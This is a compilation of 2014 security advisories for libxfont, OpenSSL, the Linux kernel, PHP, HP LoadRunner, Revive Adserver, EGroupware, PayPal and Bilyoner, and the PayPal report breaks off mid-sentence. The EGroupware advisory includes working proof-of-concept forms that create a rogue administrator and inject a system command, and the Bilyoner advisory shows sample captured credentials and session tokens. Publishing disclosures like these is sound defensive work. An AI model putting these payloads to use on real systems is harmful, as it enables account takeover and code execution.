[SECURITY] [DSA 2927-1] libxfont security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2927-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso May 13, 2014 http://www.debian.org/security/faq - - Package: libxfont CVE ID : CVE-2014-0209 CVE-2014-0210 CVE-2014-0211 Ilja van Sprundel of IOActive discovered several security issues in the X.Org libXfont library, which may allow a local, authenticated user to attempt to raise privileges; or a remote attacker who can control the font server to attempt to execute code with the privileges of the X server. CVE-2014-0209 Integer overflow of allocations in font metadata file parsing could allow a local user who is already authenticated to the X server to overwrite other memory in the heap. CVE-2014-0210 libxfont does not validate length fields when parsing xfs protocol replies allowing to write past the bounds of allocated memory when storing the returned data from the font server. CVE-2014-0211 Integer overflows calculating memory needs for xfs replies could result in allocating too little memory and then writing the returned data from the font server past the end of the allocated buffer. For the oldstable distribution (squeeze), these problems have been fixed in version 1:1.4.1-5. For the stable distribution (wheezy), these problems have been fixed in version 1:1.4.5-4. For the unstable distribution (sid), these problems have been fixed in version 1:1.4.7-2. We recommend that you upgrade your libxfont packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCgAGBQJTcpOwAAoJEAVMuPMTQ89EAMcP/RAQrmwMUCRDwR/Xiz13sc9P w1xR0K2srs3WP/i/EcBn8rWJH+4CnoCDsOeTlyfD2e748FZD1JmKDNFsWxi8t7h7 f7LnuQARbKHbscGiGRe0NFY6cNMDgjINfjMhNZfmxfxWxotNrKvJNBBec0mWKJZT K70Nj0SLKOGQF5zsQQcLjnlzH+UfklQ8druT+ToHx0SiMobQOsV97Go32nTTuGEX R/V+XaX+AdOnJO9GPw7qWI1/2nmrw2E/nHdak3Q7yVICGCSCNGiUfursHVNKYEA5 CEyk3Y0K1Ydb0dycNbEOJDTMZJUE2Nbxd64EZ0zx+bYdxM1Zoyht4Dm8MBRq0FXI K5XZlf4D//TuKNvw5p4cX7sbRlO/guDtKhyvSgUKSIk1ELXSsuYwnU2Eb4lAN/p7 7GKJ+u6UXUO3b7Nz4G8mCqLENPyqAbSh7t0TB/GtZFfZ+VLSBNmuOa7BwnmlPg1J Vcl19w5ua3XkCP86CL4cnsGRycPyt/ml8LSuO3WBhHC1np4t1i/oCOIDYtEJlnRf 9FkN20dxqgc1zKDS7QdJof5q0PKOMjcJ5jUR2l+++BRO+0fQuYoqv38B9WMG7Ljd upRU+64CeljuEcZDYnRAqApRhmHn4Tu8AYP9lqoXIdY/Rpgqo4ytHq70QVeqq68s QspMgBVG6UVqa12tpy+w =cqfo -END PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-14:10.openssl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-14:10.opensslSecurity Advisory The FreeBSD Project Topic: OpenSSL NULL pointer deference vulnerability Category: contrib Module: openssl Announced: 2014-05-13 Affects:FreeBSD 10.x. Corrected: 2014-05-13 23:19:16 UTC (stable/10, 10.0-STABLE) 2014-05-13 23:22:28 UTC (releng/10.0, 10.0-RELEASE-p3) CVE Name: CVE-2014-0198 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit URL:http://security.FreeBSD.org/. I. Background FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. The TLS protocol supports an alert protocol which can be used to signal the other party with certain failures in the protocol context that may require immediate termination of the connection. II. Problem Description An attacker can trigger generation of an SSL alert which could cause a null pointer deference. III. Impact An attacker may be able to cause a service process that uses OpenSSL to crash, which can be used in a denial-of-service attack. IV. Workaround No workaround is available, but systems that do not use OpenSSL to implement the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, or not using SSL_MODE_RELEASE_BUFFERS and use the same process to handle multiple SSL connections, are not vulnerable. The FreeBSD base system service daemons and utilities do not use the SSL_MODE_RELEASE_BUFFERS mode. However, many third party software uses this mode to reduce their memory footprint and may therefore be affected by this issue. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch http://security.FreeBSD.org/patches/SA-14:10/openssl.patch # fetch http://security.FreeBSD.org/patches/SA-14:10/openssl.patch.asc # gpg --verify openssl.patch.asc b) Execute the following commands as root: # cd /usr/src # patch /path/to/patch Recompile the operating system using buildworld and installworld as described in URL:http://www.FreeBSD.org/handbook/makeworld.html. Restart all deamons using the library, or reboot the system. 3) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r265986 releng/10.0/ r265987 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: URL:http://svnweb.freebsd.org/base?view=revisionrevision=NN VII. References URL:http://ftp.openbsd.org/pub/OpenBSD/patches/5.5/common/005_openssl.patch.sig URL:https://rt.openssl.org/Ticket/Display.html?user=guestpass=guestid=3321 URL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198 The latest revision of this advisory is available at URL:http://security.FreeBSD.org/advisories/FreeBSD-SA-14:10.openssl.asc -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.22 (FreeBSD) iQIcBAEBCgAGBQJTcq5IAAoJEO1n7NZdz2rnNb4QAODp1Pxk3GlTwlptWQkC+DJb bwd2RRtkvkz677JIbdtyM7b5POgUih/NtAF9Yyy/pg8IJcSRiv0f7F5L+maV9nee KGb27zizWOgIqor6HhRAv2OniVN271OfoyCkt0xRmigBR6dQ80iBVuCk6McvxvjL 5Yfw8wtfF8zAo5p1d4V3EEPOIVPwgJ31YnB/sVv+SyV6Ldl5DS0Gp1Cm9KjvaJUI CUIljIaH6AFuzs671V4DpuFPtFPIsvGUhEdpf6+ypVJN1J/D+BNRvoIX1zxou4Kf 34qB6cs/LlyBKCPctK/qLU7UScNsuUItpWrw5ESHFHdgsTr8XA9POxU72wlCRCoQ
CSRF and Remote Code Execution in EGroupware
Advisory ID: HTB23212 Product: EGroupware Vendor: http://www.egroupware.org/ Vulnerable Version(s): 1.8.006 community edition and probably prior Tested Version: 1.8.006 community edition Advisory Publication: April 23, 2014 [without technical details] Vendor Notification: April 23, 2014 Vendor Patch: May 6, 2014 Public Disclosure: May 14, 2014 Vulnerability Type: Cross-Site Request Forgery [CWE-352], Code Injection [CWE-94] CVE References: CVE-2014-2987, CVE-2014-2988 Risk Level: High CVSSv2 Base Scores: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered CSRF and Remote Code Execution vulnerabilities in EGroupware, which can be exploited by remote attacker to gain full control over the application and compromise vulnerable system. 1) Сross-Site Request Forgery (CSRF) in EGroupware: CVE-2014-2987 The vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can create a new user account with administrative privileges by tricking logged-in Groupware administrator to visit a malicious pages with CSRF exploit. Simple CSRF exploit below creates new administrator with login immuniweb and password immuniweb: form action=http://[host]/index.php?menuaction=admin.uiaccounts.add_user; method=post name=main input type=hidden name=account_lid value=immuniweb input type=hidden name=account_status value=A input type=hidden name=account_firstname value=firstname input type=hidden name=account_lastname value=lastname input type=hidden name=account_passwd value=immuniweb input type=hidden name=account_passwd_2 value=immuniweb input type=hidden name=changepassword value=1 input type=hidden name=expires value=2014/04/29 input type=hidden name=never_expires value=True input type=hidden name=account_email value=immuni...@immuniweb.com input type=hidden name=account_groups[] value=-2 input type=hidden name=account_primary_group value=-2 input type=hidden name=submit value=Add input type=submit id=btn /form 2) Code Injection in EGroupware: CVE-2014-2988 The vulnerability exists due to insufficient sanitisation of input data passed via the HTTP POST newsettings parameter to PHP function call_user_func(). A remote attacker with administrative privileges can inject and execute arbitrary PHP code on the target system with privileges of the webserver. This vulnerability can be exploited in pair with the above-described CSRF vulnerability. The following exploitation example writes immuniweb word into file /1.php: form action=http://[host]/index.php?menuaction=admin.uiconfig.indexappname=phpbrain; method=post name=main input type=hidden name=newsettings[system] value=echo immuniweb1.php input type=hidden name=submit value=Save input type=submit id=btn /form --- Solution: Update to EGroupware version 1.8.007 More Information: http://www.egroupware.org/forum#nabble-td3997580 http://www.egroupware.org/changelog --- References: [1] High-Tech Bridge Advisory HTB23212 - https://www.htbridge.com/advisory/HTB23212 - CSRF and Remote Code Execution in EGroupware. [2] EGroupware - http://www.egroupware.org/ - EGroupware is the leading open source collaboration tool and the top choice for big enterprises, SMEs and teams within and across organizations all over the globe. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
[security bulletin] HPSBMU03040 rev.1 - HP LoadRunner HP Performance Center, running OpenSSL, Remote Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04286049 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04286049 Version: 1 HPSBMU03040 rev.1 - HP LoadRunner HP Performance Center, running OpenSSL, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-05-14 Last Updated: 2014-05-14 Potential Security Impact: Remote disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP LoadRunner and HP Performance Center running OpenSSL. This is the OpenSSL vulnerability known as Heartbleed which could be exploited remotely resulting in disclosure of information. References: CVE-2014-0160, SSRT101565 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP LoadRunner 11.52, 12.00 HP Performance Center 11.52, 12.00 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made the following software updates available to resolve this vulnerability: HP LoadRunner 11.52, patch 2: LoadRunner Full: http://support.openview.hp.com/selfsolve/document/LID/LR_03328 VuGen SA : http://support.openview.hp.com/selfsolve/document/LID/LRVUG_00092 Analysis SA: http://support.openview.hp.com/selfsolve/document/LID/LRANLSYS_00074 Load Generator SA Windows: http://support.openview.hp.com/selfsolve/document/LID/LRLG_00051 Load Generator SA Linux: http://support.openview.hp.com/selfsolve/document/LID/LR_03304 MI Listener: http://support.openview.hp.com/selfsolve/document/LID/LR_03306 MoFW: http://support.openview.hp.com/selfsolve/document/LID/LR_03305 Monitor Probe for Microsoft COM+ Server Components: http://support.openview.hp.com/selfsolve/document/LID/LR_03307 LoadRunner 12.00 patch 1: LoadRunner Full: http://support.openview.hp.com/selfsolve/document/LID/LR_03329 VuGen SA: http://support.openview.hp.com/selfsolve/document/LID/LRVUG_00094 Analysis SA: http://support.openview.hp.com/selfsolve/document/LID/LRANLSYS_00075 Load Generator SA for Windows: http://support.openview.hp.com/selfsolve/document/LID/LRLG_00052 Load Generator SA for Linux: http://support.openview.hp.com/selfsolve/document/LID/LR_0 MI Listener: http://support.openview.hp.com/selfsolve/document/LID/LR_03316 MoFW: http://support.openview.hp.com/selfsolve/document/LID/LR_03315 VS2010 IDE Addin: http://support.openview.hp.com/selfsolve/document/LID/LR_03332 Performance Center v11.52: http://support.openview.hp.com/selfsolve/document/LID/PC_00296 Performance Center 12.00: http://support.openview.hp.com/selfsolve/document/LID/PC_00299 HP recommends following our security guidelines including the following action items: Revocation of the old key pairs that were just superseded Changing potentially affected passwords Invalidating all session keys and cookies NOTE: Bulletin Applicability: This bulletin applies to each OpenSSL component that is embedded within the HP products listed in the security bulletin. The bulletin does not apply to any other 3rd party application (e.g. operating system, web server, or application server) that may be required to be installed by the customer according instructions in the product install guide. To learn more about HP Software Incident Response, please visit http://www8.h p.com/us/en/software-solutions/enterprise-software-security-center/response-c enter.html. Software updates are available from HP Software Support Online at http://support.openview.hp.com/downloads.jsp HISTORY Version:1 (rev.1) - 14 May 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here:
Paypal Inc Bug Bounty #109 MOS - Bypass Persistent Vulnerability
Document Title: === Paypal Inc Bug Bounty #109 MOS - Bypass Persistent Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1050 PayPal Security UID: Pq115cey Release Date: = 2014-05-14 Vulnerability Laboratory ID (VL-ID): 1050 Common Vulnerability Scoring System: 4 Product Service Introduction: === PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract Advisory Information: == The Vulnerability Laboratory Research Team has discovered a filter bypass persistent Web Vulnerability in the Paypal Inc core web application api. Vulnerability Disclosure Timeline: == 2013-08-15: Researcher Notification Coordination (Ateeq ur Rehman Khan) 2013-08-16: Vendor Notification (PayPal Site Security Team - Bug Bounty Program) 2013-12-22: Vendor Response/Feedback (PayPal Site Security Team - Bug Bounty Program) 2014-05-10: Vendor Fix/Patch (PayPal Developer Team - Reward: Bug Bounty) 2013-05-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Exploitation Technique: === Remote Severity Level: === Medium Technical Details Description: A filter bypass and persistent script code injection vulnerability has been discovered in the official Paypal service application and common service api. The vulnerability allows an attacker to inject own malicious script codes in the vulnerable module on the application side (persistent). The vulnerability has been discovered in the Paypal MOS (Multi Order Shipping) Web Application (https://ship.paypal.com) and the vulnerability exists in the `Preset` module. While creating a new shipping preset, an
[SECURITY] [DSA 2928-1] linux-2.6 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-2928-1secur...@debian.org http://www.debian.org/security/ Dann Frazier May 14, 2014http://www.debian.org/security/faq - -- Package: linux-2.6 Vulnerability : privilege escalation/denial of service/information leak Problem type : local Debian-specific: no CVE Id(s) : CVE-2014-0196 CVE-2014-1737 CVE-2014-1738 Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service, information leak or privilege escalation. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2014-0196 Jiri Slaby discovered a race condition in the pty layer, which could lead to a denial of service or privilege escalation. CVE-2014-1737 CVE-2014-1738 Matthew Daley discovered an information leak and missing input sanitising in the FDRAWCMD ioctl of the floppy driver. This could result in a privilege escalation. For the oldstable distribution (squeeze), this problem has been fixed in version 2.6.32-48squeeze6. The following matrix lists additional source packages that were rebuilt for compatibility with or to take advantage of this update: Debian 6.0 (squeeze) user-mode-linux 2.6.32-1um-4+48squeeze6 We recommend that you upgrade your linux-2.6 and user-mode-linux packages. Note: Debian carefully tracks all known security issues across every linux kernel package in all releases under active security support. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, updates for lower priority issues will normally not be released for all kernels at the same time. Rather, they will be released in a staggered or leap-frog fashion. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJTc7LUAAoJEBv4PF5U/IZA8NoQAIyX2/8dvzsbg3OLweZJkjYu Ot4ixGKWN7cq1Xf9X/DSKqYcfsUUe8p/7zG8aNyMOB2Drw+m9onqjk1TtcL+UCu5 xrYNDXrGNaF7DB+79XKvlT1tuTa2nYs+S9TmtYEPNoSOQbAIYFE3Y5Kuiynb2Cg1 3ri0FrYMjPEH7ByS72qyvRQAJ6yMpjOIDL1Et3Q/H5QjrV4hyMVGfV398+c+lIdc wBAwosMX73XA4Z8HkriDG5Af+QMwEB/CtOuOnEGFneXYCKdVlGXCacR8HJxavtCr N0ffNdVe39OvM0W10WzVYiGmB1d/f1aLAWLbQg5b7bXZNEbjNpg3G5hFdjXJxf9z SQ7jO+pTaSepzwiHb4o7m3LV70tFZv9gDV8nA2iDIMBldZxJAeVD8HtiDC/2UIBU 3N4fIJiI201X5P2f0IFeKNPlNlanj2byG1pAFC/sI3s+HJPJhpa6d8Ui7yH26vbM WOiFLFlvX7e7RC7WKWBgQTQ0SRfKZ32juFxKnQqa6mqtg8E1SxMV0aCBgEvBM2Bi MoXwm+3DVqlbVb4niWKqNymFKHJTSEPDHY8BgAR4GHpIKSs2yFaSZYwpVdAydYkg sxGHdHimJQ17Q49SRf/n4u9bq3B6bTlOBJB2G0CwyHVmIqRoaLET3Rt9mvF4tsOO B+aTRD4WKSaC3hfc7iPR =gGjD -END PGP SIGNATURE-
Bilyoner mobile apps prone to various SSL/TLS attacks
=
Sceptive Security Advisory
Synopsis: Bilyoner mobile apps prone to various SSL/TLS attacks
Product: Various mobile applications
Advisory URL:
http://sceptive.com/p/bilyoner-mobile-apps-prone-to-various-ssltls-attacks
Advisory number: CVE-2014-3750
Issue date: 2014-04-02
=
1. Summary:
Bilyoner [1] is an online betting platform for various betting options on idda
[2] , spor toto [3], milli piyango [4], tjk [5].
We have found that mobile apps vulnerable to SSL/TLS attacks which eventually
lets attackers to gain sensitive information and hijack user sessions.
2. Description:
On misconfigured network environments it is possible to redirect HTTPS packets
over MITM tools for SSL sessions.
When we redirected our network on such a configuration we have observed that
app sends/receives user data unecrypted.
REQUEST
{
password: 333444,
sessionId:
9331b4c44edf7c72f4963bc1799416bd071b5eb2aa049ad7ce968b06965f444e,
username: 12312312
}
And also session-id's are vulnerable for attackers to use on their own
configurations to hijack other users' sessions. Such as;
RESPONSE
{
bilyonerCookies: {
JSESSIONID:
RQdFTcnPydRypLXc71kXhYjBtN5p5sGT31GN4hvRlsN8qTz2GQ2T!-1656694263,
NSC_wtfswfs-ttm: c3a0840e45525d5f4f58455e445a4a423660
},
bilyonerSessionId:
C1yTTcnP2wSnwyV2gstRkhrsBh8dsqJfvCYBFHqTGvVwhZSYhsJM!-1656694263!1394403087638,
sessionId:
9331b4c44edf7c72f4963bc1799416bd071b5eb2aa049ad7ce968b06965f444e
}
3. Solution:
For Android apps it's advised to upgrade 2.3.1. For IOS platforms 4.6.2 is
available..
4. Links:
[1] http://www.bilyoner.com/
[2] http://www.iddaa.com/
[3] https://www.sportoto.gov.tr/
[4] http://www.millipiyango.gov.tr/
[5] http://www.tjk.org/EN
5. Contact:
Harun Esur harun.e...@sceptive.com
Copyright 2014 Sceptive http://sceptive.com
=
[REVIVE-SA-2014-001] Revive Adserver 3.0.5 fixes CSRF vulnerability
Revive Adserver Security Advisory REVIVE-SA-2014-001 Advisory ID: REVIVE-SA-2014-001 CVE ID:CVE-2013-5954 Date: 2014-05-15 Security risk: Moderate Applications affected: Revive Adserver Versions affected: = 3.0.4 Versions not affected: = 3.0.5 Website: http://www.revive-adserver.com/ Vulnerability: CSRF Description --- A CSRF vulnerability was recently discovered and reported in OpenX Source Security Advisory CVE-2013-5954. However, the number of places in the code which were affected go well beyond those listed in the original advisory. The vulnerability allows users who are logged into the Revive Adserver console to be tricked into deleting data from their Revive Adserver installation. The vulnerability does not allow remote users to access the Revive Adserver console or otherwise modify data. Although the attack can cause loss of data and service disruptions, the risk is rated to be moderate as the vulnerability requires the victim to interact with the attack mechanism. The vulnerability is also present and exploitable in OpenX Source 2.8.11 and earlier versions, potentially back to phpAdsNew 2.0.x. Details --- HTTP GET methods are used extensively in the Revive Adserver web console for deleting data or unlinking accounts etc. instead of HTTP POST. These older style calls were not protected to prevent attack via CSRF. The scripts that have been fixed are: www/admin/admin-user-unlink.php www/admin/advertiser-delete.php www/admin/advertiser-user-unlink.php www/admin/affiliate-delete.php www/admin/affiliate-user-unlink.php www/admin/agency-delete.php www/admin/agency-user-unlink.php www/admin/banner-delete.php www/admin/campaign-delete.php www/admin/channel-delete.php www/admin/tracker-delete.php, www/admin/userlog-delete.php www/admin/zone-delete.php References -- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5954 https://github.com/revive-adserver/revive-adserver/commit/79cb2db05c9849e225885e8a622978da014a98a7 Permalink - http://www.revive-adserver.com/security/revive-sa-2014-001 Solution We strongly advise people to upgrade to the most recent 3.0.5 version of Revive Adserver, including those running OpenX Source or older versions of the application. Contact Information === The security contact for Revive Adserver can be reached at: security AT revive-adserver DOT com -- Matteo Beccati On behalf of the Revive Adserver Team http://www.revive-adserver.com/
[ MDVSA-2014:087 ] php
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:087 http://www.mandriva.com/en/support/security/ ___ Package : php Date: May 15, 2014 Affected: Business Server 1.0 ___ Problem Description: A vulnerability has been discovered and corrected in php: PHP FPM in PHP versions before 5.4.28 and 5.5.12 uses a UNIX domain socket with world-writable permissions by default, which allows any local user to connect to it and execute PHP scripts as the apache user (CVE-2014-0185). The updated php packages have been upgraded to the 5.5.12 version which is not vulnerable to this issue. Additionally, the timezonedb packages has been upgraded to the latest 2014.3 version, the php-suhosin packages has been upgraded to the latest 0.9.35 version which has better support for php-5.5 and the PECL packages which requires so has been rebuilt for php-5.5.12. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0185 ___ Updated Packages: Mandriva Business Server 1/X86_64: df283b0fbf1a40933a09a0437306e077 mbs1/x86_64/apache-mod_php-5.5.12-1.mbs1.x86_64.rpm 1abe9798b925025ec94da9a485644258 mbs1/x86_64/lib64php5_common5-5.5.12-1.mbs1.x86_64.rpm 3fd588f458b56959797fb5d014eae48f mbs1/x86_64/php-apc-3.1.15-1.6.mbs1.x86_64.rpm 7e619dee2e92ff3c380f6c4ef501d0df mbs1/x86_64/php-apc-admin-3.1.15-1.6.mbs1.x86_64.rpm 11f54447e5427fbf752b4f71b9970ce5 mbs1/x86_64/php-bcmath-5.5.12-1.mbs1.x86_64.rpm c062cda26132b4ac6c4e148c6a68734e mbs1/x86_64/php-bz2-5.5.12-1.mbs1.x86_64.rpm 881589dad906c2fb85c3a33d7fea378c mbs1/x86_64/php-calendar-5.5.12-1.mbs1.x86_64.rpm ef0d051de99575d3c71b87800ee246e5 mbs1/x86_64/php-cgi-5.5.12-1.mbs1.x86_64.rpm 4c5204cac61750016c59580d6fe12f17 mbs1/x86_64/php-cli-5.5.12-1.mbs1.x86_64.rpm a0cff9488526e5c1ea6f9cde930bf5d8 mbs1/x86_64/php-ctype-5.5.12-1.mbs1.x86_64.rpm 5b79423cbb3649eedfaadee4b7773fe6 mbs1/x86_64/php-curl-5.5.12-1.mbs1.x86_64.rpm f009622fdfd3825dc76573bea38fd269 mbs1/x86_64/php-dba-5.5.12-1.mbs1.x86_64.rpm 24a229cfcf39dc8642678b5a3c7c3cc2 mbs1/x86_64/php-devel-5.5.12-1.mbs1.x86_64.rpm 32560ad8808014a67496e34398f68922 mbs1/x86_64/php-doc-5.5.12-1.mbs1.noarch.rpm e2c2566d0b502ad2c42de98a70820e42 mbs1/x86_64/php-dom-5.5.12-1.mbs1.x86_64.rpm 4c54ba0d5daa7ed0428e687fe2ee7e44 mbs1/x86_64/php-enchant-5.5.12-1.mbs1.x86_64.rpm c240f95cec3fdc7637bff950472dad68 mbs1/x86_64/php-exif-5.5.12-1.mbs1.x86_64.rpm e6aa382fd8013fb0c7f18b0f4158e414 mbs1/x86_64/php-fileinfo-5.5.12-1.mbs1.x86_64.rpm c57d83072dfcac793e712c673991f950 mbs1/x86_64/php-filter-5.5.12-1.mbs1.x86_64.rpm 5c66528ecfd9e43979cd30e5877f8a16 mbs1/x86_64/php-fpm-5.5.12-1.mbs1.x86_64.rpm 0b69a5b8f87f5d60f9277a930ae684f5 mbs1/x86_64/php-ftp-5.5.12-1.mbs1.x86_64.rpm bdcf28c0c14570960fa1ac3831e60d60 mbs1/x86_64/php-gd-5.5.12-1.mbs1.x86_64.rpm b292b8323de1bfa84f6343374ecd2cd6 mbs1/x86_64/php-gettext-5.5.12-1.mbs1.x86_64.rpm d398f4e3d479241d7965742c3fc998ef mbs1/x86_64/php-gmp-5.5.12-1.mbs1.x86_64.rpm 6ad902976dbb65029eaec9545090efba mbs1/x86_64/php-hash-5.5.12-1.mbs1.x86_64.rpm 1f70ab02036654143b0600ada836ae75 mbs1/x86_64/php-iconv-5.5.12-1.mbs1.x86_64.rpm 43b8d3119abaebe97cd131581ad0bce7 mbs1/x86_64/php-imap-5.5.12-1.mbs1.x86_64.rpm 8a036900183251f4533a7448bb31578e mbs1/x86_64/php-ini-5.5.12-1.mbs1.x86_64.rpm 6d955beac6cd6d100e1733c463f0ec1b mbs1/x86_64/php-intl-5.5.12-1.mbs1.x86_64.rpm 31da57129ac268f8b1ee761d00229c76 mbs1/x86_64/php-json-5.5.12-1.mbs1.x86_64.rpm 982f16d428b26491fa076144cd87f7cf mbs1/x86_64/php-ldap-5.5.12-1.mbs1.x86_64.rpm efbad629641d00c18a5694108d29dc1f mbs1/x86_64/php-mbstring-5.5.12-1.mbs1.x86_64.rpm 1297ae3e46bb0916c57be1623b0b5934 mbs1/x86_64/php-mcrypt-5.5.12-1.mbs1.x86_64.rpm 857fd2c635ccbe2864300f57c4e325e1 mbs1/x86_64/php-mssql-5.5.12-1.mbs1.x86_64.rpm 43a8813edf9337c2078180cb64f40b92 mbs1/x86_64/php-mysql-5.5.12-1.mbs1.x86_64.rpm 8483d8e011ecf13b20525632c6b0f7ec mbs1/x86_64/php-mysqli-5.5.12-1.mbs1.x86_64.rpm 49ba506cc6c659b6bafa5a8c60cd98d7 mbs1/x86_64/php-mysqlnd-5.5.12-1.mbs1.x86_64.rpm d4441bd727920f3bc2a813c205b07269 mbs1/x86_64/php-odbc-5.5.12-1.mbs1.x86_64.rpm 7078d869b8ac7c0f18e5e80d31133e9d mbs1/x86_64/php-opcache-5.5.12-1.mbs1.x86_64.rpm b5e4314436efa86f825d8bd3a05a1bb2 mbs1/x86_64/php-openssl-5.5.12-1.mbs1.x86_64.rpm 2bae715891c7cba2d0f5d89b341b6f8d mbs1/x86_64/php-pcntl-5.5.12-1.mbs1.x86_64.rpm e2867aee0bcc74c716906b95313874e9 mbs1/x86_64/php-pdo-5.5.12-1.mbs1.x86_64.rpm 2d2606c285e7b1143587dcea2e6bf684 mbs1/x86_64/php-pdo_dblib-5.5.12-1.mbs1.x86_64.rpm
